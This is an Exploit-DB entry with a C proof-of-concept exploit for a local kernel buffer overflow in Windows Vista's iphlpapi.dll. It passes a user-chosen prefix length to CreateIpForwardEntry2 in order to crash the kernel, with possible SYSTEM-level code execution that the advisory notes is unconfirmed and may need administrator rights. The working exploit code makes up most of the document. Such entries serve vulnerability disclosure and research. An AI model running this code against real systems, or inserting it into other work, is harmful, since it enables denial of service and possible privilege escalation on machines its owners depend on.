Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow

EDB-ID:

32590




Platform:

Windows

Date:

2008-11-19


// source: https://www.securityfocus.com/bid/32357/info

// Microsoft Windows Vista is prone to a buffer-overflow vulnerability because of insufficient boundary checks.

// Local attackers could exploit this issue to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to execute arbitrary code with SYSTEM-level privileges, but this has not been confirmed.

// Windows Vista SP1 is vulnerable to this issue.

// UPDATE (November 25, 2008): Since this issue may be exploitable only by members of the administrative group, the security implication of this issue may be negated. 

#define _WIN32_WINNT 0x0600
#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <winsock2.h>
#include <ws2ipdef.h>
#include <iphlpapi.h>

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char** argv)
{
        DWORD                      dwStatus;
        MIB_IPFORWARD_ROW2 route;
        
        if (argc != 3)
        {
                printf("Usage: %s <ifNum> <numOfBits>\n\n", argv[0]);
                return -1;
        }

        InitializeIpForwardEntry(&route);       

        route.InterfaceIndex = atoi(argv[1]);
        route.DestinationPrefix.Prefix.si_family = AF_INET;

        route.DestinationPrefix.Prefix.Ipv4.sin_addr.s_addr = inet_addr("1.2.3.0");     
        route.DestinationPrefix.Prefix.Ipv4.sin_family = AF_INET;

        route.DestinationPrefix.PrefixLength = atoi(argv[2]);
        
        route.NextHop.Ipv4.sin_addr.s_addr = inet_addr("11.22.33.44");  
        route.NextHop.Ipv4.sin_family       = AF_INET;

        route.SitePrefixLength          = 0;

        route.Protocol                  = MIB_IPPROTO_NETMGMT;          
        route.Origin                            = NlroManual;
        route.ValidLifetime             = 0xffffffff;
        route.PreferredLifetime         = 0xffffffff;
        route.Metric                            = 1;
        
        dwStatus = CreateIpForwardEntry2(&route); 
        return dwStatus;
}